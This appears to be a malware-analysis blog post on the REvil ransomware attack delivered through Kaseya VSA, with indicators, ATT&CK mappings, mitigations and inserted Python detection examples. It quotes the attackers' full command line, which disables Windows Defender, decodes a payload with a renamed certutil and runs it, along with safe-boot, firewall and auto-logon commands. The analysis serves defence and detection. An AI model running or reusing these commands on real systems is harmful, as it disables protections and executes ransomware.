Analyzing the REvil Ransomware Attack

Bajrang Mane

Last updated on: December 22, 2022

Over the past year, there has been a rise in extortion malware, e.g. Nefilim and Darkside, which steal and threaten to publish sensitive data or encrypt it until a ransom is paid. Nowadays, cybercriminals use various techniques to gain their initial foothold within a network in the organization. One of the techniques is a supply chain attack.

In a software supply chain attack, hackers compromise an organization by manipulating the code in third-party software components used by the organization, such as what was seen with SolarWinds in December of 2020. On July 2, 2021, Kaseya announced its software had been compromised and was being used to attack the IT infrastructure of its customers. Kaseya VSA is an IT management suite, commonly used for managing software and patching for Windows OS, macOS, or third-party software. Unlike the SolarWinds attack, the attackers’ goal was monetary gain rather than cyber espionage.

The attacks have been attributed to REvil, a ransomware family first identified in April 2019 according to MITRE. REvil has been linked to GOLD SOUTHFIELD, a financially motivated group that operates a “Ransomware as a Service” model. The group distributes the ransomware via exploit kits, scan-and-exploit techniques, exposed RDP servers, and backdoored software installers.

REvil attackers exfiltrate sensitive data before encryption. When ransoms are not paid, they have been known to shame victims by posting their data on the dark web. During our research, we have seen some of the victim sample data on their onion site.

Fig. 1: Dark website

Technical Details

Initial access

The ransomware was delivered as a malicious update payload pushed through the Kaseya VSA server platform. The REvil gang used a zero-day vulnerability in the Kaseya VSA server (CVE-2021-30116) to gain that access.

Security researchers at Huntress Labs and TrueSec have identified three zero-day vulnerabilities potentially used in attacks against their clients:

  • Authentication Bypass Vulnerability
  • Arbitrary File Upload Vulnerability
  • Code Injection Vulnerability

Multiple sources have reported that the following procedure and command were used to install and execute the ransomware on Windows systems.

The “Kaseya VSA Agent Hot-fix” procedure ran the following command:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

The above command disables Windows Defender, copies certutil.exe to C:\Windows\cert.exe (appending a random value so the copy's hash differs from the original), and uses it to decode the agent.crt file into agent.exe. Certutil.exe is a well-known “living-off-the-land” binary capable of downloading and decoding web-encoded content. To avoid detection based on the utility's name, the attacker ran the renamed copy rather than certutil.exe itself, deleted both the renamed copy and agent.crt, and then executed the decoded payload agent.exe.

File       SHA256
agent.exe  d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

agent.exe carries two embedded resources, MODLIS and SOFTIS, as shown in the following image.

Fig. 2: Resource from agent.exe

Agent.exe drops these resources into the Windows folder: MODLIS is written as mpsvc.dll and SOFTIS as MsMpEng.exe.

Resource/File  SHA256
MODLIS         e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
mpsvc.dll      8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
SOFTIS         33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
MsMpEng.exe    33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a

MsMpEng.exe is an older, legitimately signed version of Microsoft's Antimalware Service executable that is vulnerable to DLL side-loading. In a DLL side-loading attack, the attacker places a malicious DLL carrying the name of a library the target executable expects (here mpsvc.dll) next to that executable, so the loader picks up the malicious copy and the code runs under the trusted, signed process.

Fig. 3: Version information of MsMpeng.exe
Fig. 4: Digital certificate information of MsMpeng.exe

Agent.exe drops MsMpEng.exe and mpsvc.dll and then launches MsMpEng.exe, as shown in the following image.

Fig. 5: Drop files and create a process of MsMpEng.exe

Ransomware Execution

When MsMpEng.exe runs and calls ServiceCrtMain, the malicious mpsvc.dll is loaded and its code is executed.

Fig. 6: ServiceCrtMain call function of MsMpEng.exe
Fig. 7: ServiceCrtMain call function of MsMpEng.exe

The ransomware uses OpenSSL for its cryptographic operations.

Fig. 8: Use OpenSSL to conduct Cryptographic Operations

The malware uses the ‘CreateFileMappingW’ and ‘MapViewOfFile’ functions to bring code into memory. ‘CreateFileMappingW’ creates a file-mapping object and returns a handle to it; ‘MapViewOfFile’ then maps the file into the process address space and returns a pointer to the start of the mapped view.

Fig. 9: Use CreateFileMappingW and MapViewOfFile to bring code in memory 

The malware allocates memory and decrypts the main payload, a PE file, into it. To evade detection, it strips magic constants that are not needed at load time from the header, namely 0x4D5A (“MZ”) and 0x5045 (“PE”). The payload therefore has to be loaded and executed like shellcode rather than by the Windows loader.

Most malware authors now use custom packers that unpack and load a payload module without the PE header magic constants at load time. These packers keep the other header information the loader needs, such as the section headers, the import table, and the relocation data.

Fig. 10: Main Payload 
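The two paragraphs above describe a payload whose MZ and PE magic values are stripped while the rest of the NT header chain stays intact. The following Python is an added example, not code from the original post or from any analysis tool, showing how a memory- or file-scanning heuristic can still recognise such a header: it follows e_lfanew and checks the machine type, section count, optional-header size and optional-header magic instead of relying on the stripped signatures. The sample image it builds is constructed for the demonstration; the field offsets come from the PE specification.

```python
import struct

# Constants from the PE specification (IMAGE_DOS_HEADER / IMAGE_NT_HEADERS).
DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
MACHINES = {0x014C: "i386", 0x8664: "x64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def classify_pe_header(buf: bytes) -> dict:
    """Inspect a buffer that may hold a PE image whose MZ/PE magic was stripped.

    The heuristic does not trust the magic values. It walks
    e_lfanew -> IMAGE_FILE_HEADER -> optional header and checks the fields an
    in-memory loader still needs to be consistent. 'headerless_pe' is set when
    that chain is valid but at least one of the two signatures is missing.
    """
    result = {"mz_present": False, "pe_present": False, "headerless_pe": False,
              "machine": None, "format": None, "sections": 0}
    if len(buf) < 0x40:
        return result
    result["mz_present"] = buf[:2] == DOS_MAGIC
    # e_lfanew: offset of the NT headers, stored at 0x3C in the DOS header.
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    # Plausibility: must lie past the DOS header and leave room for
    # signature (4) + IMAGE_FILE_HEADER (20) + optional header magic (2).
    if e_lfanew < 0x40 or e_lfanew + 4 + 20 + 2 > len(buf):
        return result
    result["pe_present"] = buf[e_lfanew:e_lfanew + 4] == PE_SIGNATURE
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, ..., SizeOfOptionalHeader.
    machine, nsections = struct.unpack_from("<HH", buf, e_lfanew + 4)
    size_opt = struct.unpack_from("<H", buf, e_lfanew + 4 + 16)[0]
    opt_magic = struct.unpack_from("<H", buf, e_lfanew + 24)[0]
    if machine not in MACHINES or opt_magic not in OPTIONAL_MAGIC:
        return result
    if not (1 <= nsections <= 96) or size_opt < 0x60:
        return result
    result.update(machine=MACHINES[machine], format=OPTIONAL_MAGIC[opt_magic],
                  sections=nsections)
    result["headerless_pe"] = not (result["mz_present"] and result["pe_present"])
    return result


def build_sample_image(strip_magic: bool) -> bytes:
    """Construct a minimal PE32 header (sample data only, not a real binary)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = DOS_MAGIC
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=i386, 3 sections, SizeOfOptionalHeader=0xE0, Characteristics.
    file_header = struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (0xE0 - 2)
    image = bytes(dos) + PE_SIGNATURE + file_header + optional
    if strip_magic:
        # Zero exactly what the packer described above removes: "MZ" and "PE\0\0".
        image = b"\0\0" + image[2:e_lfanew] + b"\0\0\0\0" + image[e_lfanew + 4:]
    return image


if __name__ == "__main__":
    for stripped in (False, True):
        print("stripped" if stripped else "intact  ",
              classify_pe_header(build_sample_image(stripped)))
```

Scanning each readable, executable region of a suspect process with this check, rather than searching for the "MZ" string, is what catches the loading style the post describes; a plain signature scan sees only zeros where the magic used to be.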

The malware decrypts and loads its configuration, which is in JSON format.

Fig. 11: Config File

The config file contains the following fields:

Field   Definition
pk      Public key, base64-encoded
pid     Version ID
sub     Tag number
dbg     Debug-mode flag
et      Encryption type
wipe    Wipe-folder flag
fld     Folders to skip during the encryption process
fls     Files to skip during the encryption process
ext     File extensions to skip during the encryption process
wfld    Folders to wipe
prc     Process names to terminate
dmn     Potential list of C&C domains
net     Communication flag
nbody   Ransom note, base64-encoded
nname   Ransom note file name/extension
exp     Local privilege escalation flag
img     Ransom note in bitmap form
arn     Persistence flag
rdmcnt  Readme count
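As an added example (not the post's own code or the ransomware's), the following Python takes a configuration in the field layout tabulated above and pulls out what a responder needs first: the C&C domains for blocking, the services and processes the sample stops, the folders it wipes, the behaviour flags, and the decoded ransom-note text. The sample configuration and every value in it are constructed placeholders. The post does not state the value types of the list-like fields, so the helper accepts either JSON lists or semicolon-separated strings; that is an assumption, not something the post confirms.

```python
import base64
import json

# Constructed sample in the layout of the field table above. Every value is a
# placeholder chosen for the demonstration; none comes from a real sample.
SAMPLE_CONFIG = json.dumps({
    "pk": base64.b64encode(b"\x11" * 32).decode(),
    "pid": "PLACEHOLDER-VERSION-ID",
    "sub": "1234",
    "dbg": False,
    "et": 0,
    "wipe": True,
    "fld": ["program files", "windows", "$recycle.bin"],
    "fls": ["ntldr", "boot.ini", "bootsect.bak"],
    "ext": ["exe", "dll", "sys", "lnk"],
    "wfld": ["backup"],
    "prc": ["sql", "veeam", "backup"],
    # Semicolon-separated string form (assumed possible; see lead-in).
    "dmn": "example-c2.invalid;another-c2.invalid",
    "net": True,
    "svc": ["vss", "sql", "veeam"],
    "nbody": base64.b64encode(
        b"---=== Welcome ===---\r\nYour files are encrypted.\r\n").decode(),
    "nname": "{EXT}-readme.txt",
    "exp": True,
    "img": "placeholder",
    "arn": True,
    "rdmcnt": 0,
})


def _as_list(value) -> list:
    """Normalise a config field to a list (JSON list or ';'-joined string)."""
    if isinstance(value, list):
        return [str(v) for v in value]
    if isinstance(value, str) and value:
        return [part for part in value.split(";") if part]
    return []


def triage_config(raw: str) -> dict:
    """Extract blocking/hunting data and behaviour flags from a config JSON."""
    cfg = json.loads(raw)
    note = base64.b64decode(cfg.get("nbody", "")).decode("utf-8", "replace")
    return {
        "domains": sorted(set(_as_list(cfg.get("dmn")))),
        "killed_processes": _as_list(cfg.get("prc")),
        "stopped_services": _as_list(cfg.get("svc")),
        "skipped_extensions": _as_list(cfg.get("ext")),
        "wiped_folders": _as_list(cfg.get("wfld")),
        "note_name": cfg.get("nname"),
        "note_first_line": note.splitlines()[0] if note else "",
        "c2_enabled": bool(cfg.get("net")),
        "persistence": bool(cfg.get("arn")),
        "privesc": bool(cfg.get("exp")),
        "wipe": bool(cfg.get("wipe")),
    }


if __name__ == "__main__":
    for key, value in triage_config(SAMPLE_CONFIG).items():
        print(f"{key:20} {value}")
```

The "stopped_services" and "killed_processes" lists are worth feeding back into detection: a burst of service-stop and process-terminate events for backup and database software, followed by the ransom-note file name, is the behavioural shape of the encryption phase regardless of the binary's hash.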

The ransomware changes the local firewall rules with the following command, which enables the “Network Discovery” rule group:

netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes

Fig. 12: Command to change local firewall

It creates the following Registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter

The following values are added in HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter:

96Ia6 = {Hex Value}
Ed7 = {Hex Value}
JmfOBvhb = {Hex Value}
QIeQ = {Hex Value}
Ucr1RB = {Hex Value}
wJWsTYE = .{appended extension to files after encryption}

The malware adds registry values under the following Registry Key. 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

  • AutoAdminLogon = 1 
  • DefaultUserName = {Current User Name} 
  • DefaultPassword = “DTrump4ever” 

With these values set, Windows automatically logs on with the stored credentials at the next boot.

The malware executes the following commands to force the computer to boot into safe mode with Networking:
bcdedit /set {current} safeboot network 

The malware also adds the same command to the Registry under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce 

*MarineLePen = bcdedit /set {current} safeboot network 
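The host-side behaviours described in this post (the Defender-disabling PowerShell and the renamed certutil copy from the Kaseya procedure, MsMpEng.exe side-loading mpsvc.dll from the Windows folder, the Network Discovery firewall change, the Winlogon auto-logon values, and the bcdedit safe-boot command with its RunOnce copy) are each visible in process-creation, image-load and registry telemetry. The following Python is an added example, not code from the original post or from any vendor, that runs a small rule set over constructed Sysmon-style events (EventID 1 process create, 7 image loaded, 13 registry value set) written as key=value|key=value lines. The line format, the field names, and the two legitimate Defender paths used to judge a side-load are assumptions made for the example.

```python
import re

# Constructed events in a Sysmon-like key=value|key=value form (assumed layout).
SAMPLE_EVENTS = [
    "EventID=1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|OriginalFileName=PowerShell.EXE|CommandLine=powershell.exe Set-MpPreference"
    " -DisableRealtimeMonitoring $true -DisableIOAVProtection $true",
    "EventID=1|Image=C:\\Windows\\cert.exe|OriginalFileName=CertUtil.exe"
    "|CommandLine=C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe",
    "EventID=1|Image=C:\\Windows\\System32\\netsh.exe|OriginalFileName=netsh.exe"
    "|CommandLine=netsh advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes",
    "EventID=1|Image=C:\\Windows\\System32\\bcdedit.exe|OriginalFileName=bcdedit.exe"
    "|CommandLine=bcdedit /set {current} safeboot network",
    "EventID=13|Image=C:\\Windows\\MsMpEng.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AutoAdminLogon|Details=1",
    "EventID=13|Image=C:\\Windows\\MsMpEng.exe"
    "|TargetObject=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*MarineLePen"
    "|Details=bcdedit /set {current} safeboot network",
    "EventID=7|Image=C:\\Windows\\MsMpEng.exe|ImageLoaded=C:\\Windows\\mpsvc.dll",
    # Benign lines that must not fire: certutil used in place, Defender's own load.
    "EventID=1|Image=C:\\Windows\\System32\\certutil.exe|OriginalFileName=CertUtil.exe"
    "|CommandLine=certutil -hashfile C:\\Temp\\setup.msi SHA256",
    "EventID=7|Image=C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0-0\\MsMpEng.exe"
    "|ImageLoaded=C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0-0\\mpsvc.dll",
]

# Assumed legitimate locations for Defender's own MsMpEng.exe / mpsvc.dll.
DEFENDER_DIRS = ("c:\\programdata\\microsoft\\windows defender\\",
                 "c:\\program files\\windows defender\\")


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' line into a dict (first '=' wins)."""
    ev = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        ev[key] = value
    return ev


def _cmd(ev): return ev.get("CommandLine", "")
def _is_certutil(ev): return ev.get("OriginalFileName", "").lower() == "certutil.exe"


def defender_tamper(ev):
    return ev.get("EventID") == "1" and re.search(
        r"Set-MpPreference\b.*-Disable\w+\s+\$true", _cmd(ev), re.I) is not None

def renamed_certutil(ev):
    # Binary identity comes from the PE version info, not the on-disk name.
    return (ev.get("EventID") == "1" and _is_certutil(ev)
            and not ev.get("Image", "").lower().endswith("\\certutil.exe"))

def certutil_decode(ev):
    return ev.get("EventID") == "1" and _is_certutil(ev) and re.search(
        r"\s-decode\s", _cmd(ev), re.I) is not None

def network_discovery_firewall(ev):
    return ev.get("EventID") == "1" and re.search(
        r"netsh\b.*advfirewall\b.*group=\"?Network Discovery\"?.*enable=yes",
        _cmd(ev), re.I) is not None

def safeboot_bcdedit(ev):
    return ev.get("EventID") == "1" and re.search(
        r"bcdedit\b.*safeboot", _cmd(ev), re.I) is not None

def winlogon_autologon(ev):
    return ev.get("EventID") == "13" and re.search(
        r"\\Winlogon\\(AutoAdminLogon|DefaultPassword|DefaultUserName)$",
        ev.get("TargetObject", ""), re.I) is not None

def runonce_safeboot(ev):
    return (ev.get("EventID") == "13" and "\\RunOnce\\" in ev.get("TargetObject", "")
            and "safeboot" in ev.get("Details", "").lower())

def msmpeng_sideload(ev):
    image, loaded = ev.get("Image", "").lower(), ev.get("ImageLoaded", "").lower()
    return (ev.get("EventID") == "7" and image.endswith("\\msmpeng.exe")
            and loaded.endswith("\\mpsvc.dll")
            and not loaded.startswith(DEFENDER_DIRS))


RULES = [defender_tamper, renamed_certutil, certutil_decode, network_discovery_firewall,
         safeboot_bcdedit, winlogon_autologon, runonce_safeboot, msmpeng_sideload]


def detect(lines) -> dict:
    """Return {line_index: [rule names]} for every line that matches a rule."""
    hits = {}
    for i, line in enumerate(lines):
        ev = parse_event(line)
        matched = [rule.__name__ for rule in RULES if rule(ev)]
        if matched:
            hits[i] = matched
    return hits


if __name__ == "__main__":
    for idx, names in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

The renamed-certutil rule is the one worth copying into a real SIEM: matching on OriginalFileName rather than on the image path is what survives the copy-and-rename step in the Kaseya procedure, and the decode rule then fires on the same event even though "certutil" never appears on the command line.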

Finally, a ransom note is dropped using a random filename for example “s5q78-readme.txt”.

Fig. 13: Ransom note

Dashboard

To track your exposure, download and run the Kaseya (REvil RansomWare) dashboard.

Artifact

  • The group launches 0day authorization bypass/SQL injection attack via the userFilterTableRpt.asp file.
  • In the first stage, they delete logs in multiple locations (IIS logs as well as logs stored in the application database).
  • The group delivers a PowerShell payload that disables Windows Defender.
  • The group copied and renamed certutil.exe to cert.exe before running the commands.
  • The group uses certutil.exe to decode the previously uploaded agent.crt into agent.exe and then executes it.
  • The group uploaded a .js file masquerading as a .jpg file (screenshot.jpg).
  • The group has used services like Shodan to collect a list of targets before attacking.
  • The group encrypts files on victim systems and demands a ransom to decrypt the files.

REvil TTP Map

Reconnaissance
  • Search Open Technical Databases: Scan Databases (T1596.005)

Initial Access
  • Exploit Public-Facing Application (T1190)

Execution
  • Command and Scripting Interpreter: PowerShell (T1059.001)

Defense Evasion
  • Indicator Removal on Host: File Deletion (T1070.004)
  • Deobfuscate/Decode Files or Information (T1140)
  • Masquerading (T1036)
  • Masquerading: Rename System Utilities (T1036.003)
  • Hijack Execution Flow: DLL Side-Loading (T1574.002)
  • Subvert Trust Controls: Code Signing (T1553.002)
  • Impair Defenses: Disable or Modify System Firewall (T1562.004)
  • Virtualization/Sandbox Evasion: Time Based Evasion (T1497.003)
  • Modify Registry (T1112)
  • Impair Defenses: Disable or Modify Tools (T1562.001)

Command and Control
  • Ingress Tool Transfer (T1105)

Impact
  • Data Manipulation: Stored Data Manipulation (T1565.001)
  • Data Encrypted for Impact (T1486)
  • Defacement: Internal Defacement (T1491.001)

Mitigation or Additional Important Safety Measures

Network

  • Use strong, unique passwords for login accounts.
  • Disable RDP if it is not used. If it is required, move it to a non-standard port.
  • Configure the firewall in the following way:
    • Deny access from public IPs to important ports (in this case RDP port 3389).
    • Allow access only from IPs that are under your control.
  • Use a VPN to reach the network instead of exposing RDP to the Internet, and implement two-factor authentication (2FA) where possible.
  • Set an account lockout policy that hinders credential guessing.
  • When managing access to shared network folders, create a separate network folder for each user.

Take regular data backup

  • Protect systems from ransomware by backing up important files regularly and keeping a recent backup copy offline. Encrypt your backups.
  • If a computer is infected with ransomware, its files can be restored from the offline backup once the malware has been removed.
  • Always use a combination of online and offline backups.
  • Do not leave offline backups connected to your system, as that data could be encrypted when ransomware strikes.

Keep software updated

  • Always keep your security software (antivirus, firewall, etc.) up to date to protect your computer from new variants of malware.
  • Regularly patch and update applications, software, and operating systems to address any exploitable software vulnerabilities.
  • Do not download cracked/pirated software as they risk backdoor entry for malware into your computer.
  • Avoid downloading software from untrusted P2P or torrent sites. In most cases, they are malicious software.

Use the minimum required privileges

  • Do not assign Administrator privileges to users. Most importantly, do not stay logged in as an administrator unless it is strictly necessary, and avoid browsing, opening documents, or other regular work while logged in as an administrator.

Indicators of Compromise (IOCs)

SHA256

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
